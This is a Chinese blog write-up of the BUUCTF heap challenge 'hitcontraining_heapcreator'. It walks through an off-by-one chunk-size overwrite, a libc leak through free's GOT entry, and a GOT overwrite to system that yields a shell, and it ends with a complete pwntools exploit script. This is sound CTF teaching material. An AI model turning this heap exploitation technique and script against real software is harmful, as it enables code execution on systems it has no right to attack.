hitcontraining_heapcreator--简单堆利用

D0wnBe@t Lv4
  2024-08-31 20:15:38 2024-08-31 20:15:38 创建   2024-08-31 22:06:53 2024-08-31 22:06:53 更新    849 字  4 分钟  

BUUCTF-hitcontraining_heapcreator

很明显的堆菜单题目

  • menu

  • create_heap

  • delete_heap

  • edit_heap

  • show_heap

分析:

  • 各个功能块都展示完了,发现在edit_heap有一个**off_by_one漏洞,那么我们可以修改下一个chunk的size**
  • 将其free掉,再add回来,就可以修改chunk的内容,注意到show_heap是一个**%s + 地址**,那么我们将其填入free_got,就可以得到free的真实地址,从而泄露libc,获得system,但是光system不够啊。
  • 再注意到delete_heap,是free(地址),我们将free_got -> system,再在那个地址填入b’/bin/sh\x00’,就可以getshell了
  • 具体思路就这些了,来看gdb调试的:

gdb调试

1.申请三次chunk

1
2
3
4
add(0x18,b'aaaa') # 0 -> 2个chunk
add(0x10,b'bbbb') # 1 -> 4个chunk
add(0x10,b'cccc') # 2 -> 6个chunk
bug()

  • 调用了三次create_heap,有6个chunk,看看其内容是什么

可以猜测,相比于正常的chunk结构,这里前面多了一个chunk的结构体,记录了其size和user_data_address

1
2
3
4
struct heap{
    int size;
    int* heaparray[i] // 大概意思 
}

2.利用off_by_one修改size

1
2
3
payload = b'/bin/sh\x00' + p64(0)*2 + p8(0x81)
edit(0,payload)
free(1)

  • 从箭头处,也就是data处填入数据,往heaparray[0]处地址写入/bin/sh,修改chunk1结构体size,使得下方0x70的内容被合并为一个chunk,之后的free和malloc都会被当成一个chunk处理

3.add修改show部分的地址为free_got,泄露libc

1
2
3
4
5
6
7
8
9
10
11
 此时1,2合并,修改2号chunk_data为free_got,show出来泄漏真实地址
free_got = elf.got['free']
payload = p64(0)*8 + p64(0x8) + p64(free_got) #0x8记录的是chunk2的size,也是后面edit的长度,0x8,0x10都可以
add(0x70,payload)
show(2)
free_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
log.success("free_address:",hex(free_addr))

libc = LibcSearcher('free',free_addr)
base = free_addr - libc.dump('free')
system = base + libc.dump('system')

  • 对于chunk2,也就是heaparray[2]来说,它的内容已经更改,show的时候就是show(0x602018),也就是将free_got指向的内容给输出出来,也就是输出free的真实地址

  • 此时的heaparray内容如上,因此show可以将free真实地址show出来

4.修改free_got->system,然后执行free

1
2
3
4
5
# 修改free_got->system
edit(2,p64(system))

free(0)
p.interactive()

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
from pwn import *
from LibcSearcher3 import *
context(arch='amd64',log_level='debug')

p = process("./pwn")
#p = remote("node5.buuoj.cn",27902)
elf = ELF("./pwn")

def bug():
    gdb.attach(p)
    pause()

def choice(idx):
    p.sendlineafter("Your choice :",str(idx))

def add(size,content):
    choice(1)
    p.sendlineafter("Size of Heap : ",str(size))
    p.sendlineafter("Content of heap:",content)

def edit(idx,content): # off_by_one
    choice(2)
    p.sendlineafter("Index :",str(idx))
    p.sendlineafter("Content of heap : ",content)

def show(idx):
    choice(3)
    p.sendlineafter("Index :",str(idx))

def free(idx):
    choice(4)
    p.sendlineafter("Index :",str(idx))

add(0x18,b'aaaa') # 0 -> 2个chunk
add(0x10,b'bbbb') # 1 -> 4个chunk
add(0x10,b'cccc') # 2 -> 6个chunk
# bug()
# 利用off_by_one修改size
payload = b'/bin/sh\x00' + p64(0)*2 + p8(0x81)
edit(0,payload)
free(1)

# 此时1,2合并,修改2号chunk_data为free_got,show出来泄漏真实地址
free_got = elf.got['free']
payload = p64(0)*8 + p64(0x10) +p64(free_got)
add(0x70,payload)
show(2)
free_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
log.success("free_address:",hex(free_addr))

libc = LibcSearcher('free',free_addr)
base = free_addr - libc.dump('free')
system = base + libc.dump('system')

# 修改free_got->system
edit(2,p64(system))

free(0)
p.interactive()

总结:

  • 在分析各个功能块的时候就要有想法,简单堆题一定要对地址掌握收悉。
  • 标题: hitcontraining_heapcreator--简单堆利用
  • 作者: D0wnBe@t
  • 创建于 : 2024-08-31 20:15:38
  • 更新于 : 2024-08-31 22:06:53
  • 链接: http://downbeat.top/2024/08/31/hitcontraining-heapcreator-简单堆利用/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
hitcontraining_heapcreator--简单堆利用
  1. BUUCTF-hitcontraining_heapcreator
    1. 分析:
    2. gdb调试
    3. 完整EXP
    4. 总结: